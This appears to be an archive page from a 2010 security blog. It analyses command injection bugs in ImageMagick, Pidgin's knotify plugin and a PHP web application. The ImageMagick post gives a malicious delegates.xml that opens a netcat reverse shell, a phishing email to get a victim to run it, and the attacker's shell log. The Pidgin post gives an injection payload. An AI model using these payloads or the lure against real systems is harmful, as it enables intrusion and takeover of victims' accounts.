Showing posts with label code injection.

Thursday, December 30, 2010

Funny ImageMagic CMD Injection

Sometimes I don't read vendors' vulnerability reports, because they are so boring and don't give technical information about the vulnerability. The other day I read an Ubuntu Security Notice vulnerability report and it seemed interesting. First I read the description section, which says:
"It was discovered that ImageMagick would search for configuration files in
the current directory. If a user were tricked into opening or processing an
image in an arbitrary directory, a local attacker could execute arbitrary
code with the user's privileges." [1]

After that I searched for the vulnerability's CVE ID, "CVE-2010-4167". If I hadn't found anything I would have reviewed the diff files, but the Debian bug tracking page helped me. [2]
I always believe that bug tracking systems are very useful for finding security bugs and developing exploits.

The opened issue was real: when you create config files and run ImageMagick, it looks in the current directory for config files, so if you are able to place a malicious config file there, or your target runs the "convert" binary in a directory containing your malicious config file, you can execute commands with the current user's privileges.

We create malicious XML config files that execute commands in the current user's context. In this example, I execute netcat to get a reverse shell :-) I mail them to my victim:
"Hello dear, I need to convert my png file to jpg and I can't access my computer now, can you do it for me? I attached the png file.."

If my victim opens it (in this case he will open it :P ) my arbitrary code will be executed on the system.

Victim:
[victim@vmware:~/img]$ unzip please_convert.zip
... snipped ...
[victim@vmware:~/img]$ convert x.png a.jpg
convert: unable to open image `/tmp/magick-XXFJtZIk': No such file or directory @ blob.c/OpenBlob/2480.
convert: unable to open file `/tmp/magick-XXFJtZIk': No such file or directory @ constitute.c/ReadImage/569.
convert: missing an image filename `a.jpg' @ convert.c/ConvertImageCommand/2838.


Attacker:
[cb@lab:~/imagemagic-Xploi7]$ nc.traditional -lvvp 1337
listening on [any] 1337 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 37267
ls
coder.xml
delegates.xml
sshoos
xploit.txt
x.png
echo "owned :P"
owned :P
exit
 sent 24, rcvd 57



Here is the example delegate.xml file:
<delegatemap>
<delegate decode='png' command="nc.traditional -e /bin/sh 127.0.0.1 1337"/>
</delegatemap>

and here is the example coder.xml file:
<codermap>
<coder magick='png' name='notpng'/>
</codermap>


Note: the delegate.xml file needs coder.xml in order to be used by ImageMagick.

References:
[1] - http://www.ubuntu.com/usn/usn-1028-1
[2] - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=601824

Monday, September 13, 2010

Funny Command Injection in Pidgin

Today @_ikki tweeted about this funny "fail" bug. Pidgin's knotify plugin has a remote command injection vulnerability. When you type some commands to your victim, they are executed with the current user's local privileges. It's funny!! :>

--[src/pidgin-knotify.c:71-74]--
command = g_strdup_printf("kdialog --title '%s' --passivepopup '%s' %d", title,
body, timeout);
[...]
result = system(command);
--snip--


Exploitation:
Send a message to a friend who uses the old knotify version --> ';COMMAND;'
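As an added example (not code from the post or from the Pidgin project), the snippet below rebuilds the knotify command line two ways: the string-interpolation pattern from the C excerpt above, and the same line with each user-controlled value single-quoted for /bin/sh, plus a small check that flags metacharacters sitting outside quotes. Function names are my own and nothing is executed; the hardened alternative in practice is an argv vector passed to g_spawn_async() so no shell parses the text at all.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Quote one value for /bin/sh: wrap it in single quotes and replace every
 * embedded ' with '\'' so the quotes can never be closed from inside. */
char *shell_quote(const char *s)
{
    size_t n = 3; const char *p;
    for (p = s; *p; p++)
        n += (*p == '\'') ? 4 : 1;
    char *out = malloc(n), *o = out;
    if (!out) return NULL;
    *o++ = '\'';
    for (p = s; *p; p++) {
        if (*p == '\'') { memcpy(o, "'\\''", 4); o += 4; }
        else *o++ = *p;
    }
    *o++ = '\'';
    *o = '\0';
    return out;
}

/* Build the knotify command line. quoted == 0 reproduces the vulnerable
 * g_strdup_printf() pattern; quoted == 1 quotes each value first. Caller frees. */
char *build_command(const char *title, const char *body, int timeout, int quoted)
{
    char *t = quoted ? shell_quote(title) : (char *)title;
    char *b = quoted ? shell_quote(body) : (char *)body;
    if (!t || !b) { if (quoted) { free(t); free(b); } return NULL; }
    size_t n = strlen(t) + strlen(b) + 64; char *cmd = malloc(n);
    if (cmd && quoted)
        snprintf(cmd, n, "kdialog --title %s --passivepopup %s %d", t, b, timeout);
    else if (cmd)
        snprintf(cmd, n, "kdialog --title '%s' --passivepopup '%s' %d", t, b, timeout);
    if (quoted) { free(t); free(b); }
    return cmd;
}

/* Detection check: return 1 if a shell metacharacter sits outside single
 * quotes (and is not backslash-escaped), i.e. where sh would split commands. */
int has_unquoted_metachar(const char *cmd)
{
    for (int in_sq = 0; *cmd; cmd++) {
        if (*cmd == '\'') in_sq = !in_sq;
        else if (!in_sq && *cmd == '\\' && cmd[1]) cmd++;
        else if (!in_sq && strchr(";|&`$\n", *cmd)) return 1;
    }
    return 0;
}
```

Feeding the post's ';COMMAND;' shape through build_command with quoted == 0 yields a line the check flags, while the quoted build keeps the whole value inside one shell word.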

Reference:
https://bugs.gentoo.org/show_bug.cgi?id=336916

Thursday, July 22, 2010

[Analysis] Yet Another Remote Command Execution

Here I am again, blog, with another Remote Command Execution analysis :) I suppose I can classify this vulnerability as Code Injection or RCE. Anyway, let me start examining the source code.


xxxxxxxxxxxx.php
...
$command = 'HTTP_COOKIE="'.getStringFromServer('HTTP_COOKIE').'" '.
'REMOTE_ADDR="'.getStringFromServer('REMOTE_ADDR').'" '.
'QUERY_STRING="'.$query_string.'" '.
'SERVER_SOFTWARE="'.getStringFromServer('SERVER_SOFTWARE').'" '.
'SCRIPT_NAME="'.getStringFromServer('SCRIPT_NAME').'" '.
'HTTP_USER_AGENT="'.getStringFromServer('HTTP_USER_AGENT').'" '.
'HTTP_ACCEPT_ENCODING="'.getStringFromServer('HTTP_ACCEPT_ENCODING').'" '.
'HTTP_ACCEPT_LANGUAGE="'.getStringFromServer('HTTP_ACCEPT_LANGUAGE').'" '.
'PATH_INFO="'.$path.'" '.
'PATH="'.getStringFromServer('PATH').'" '.
'HTTP_HOST="'.getStringFromServer('HTTP_HOST').'" '.
'DOCUMENT_ROOT="'.getStringFromServer('DOCUMENT_ROOT').'" '.
...
passthru($command);
...


There is no filtering or anything of the sort in the getStringFromServer function. There is no need to say more :) You can execute commands on the target via HTTP headers (e.g. Cookie, User-Agent, Accept-Encoding, Accept-Language). Exploit? I will probably write and publish a remote exploit that pops a reverse shell in a day or two. Speaking from my own, admittedly limited, experience, web applications and their vulnerabilities should not be underestimated.

cb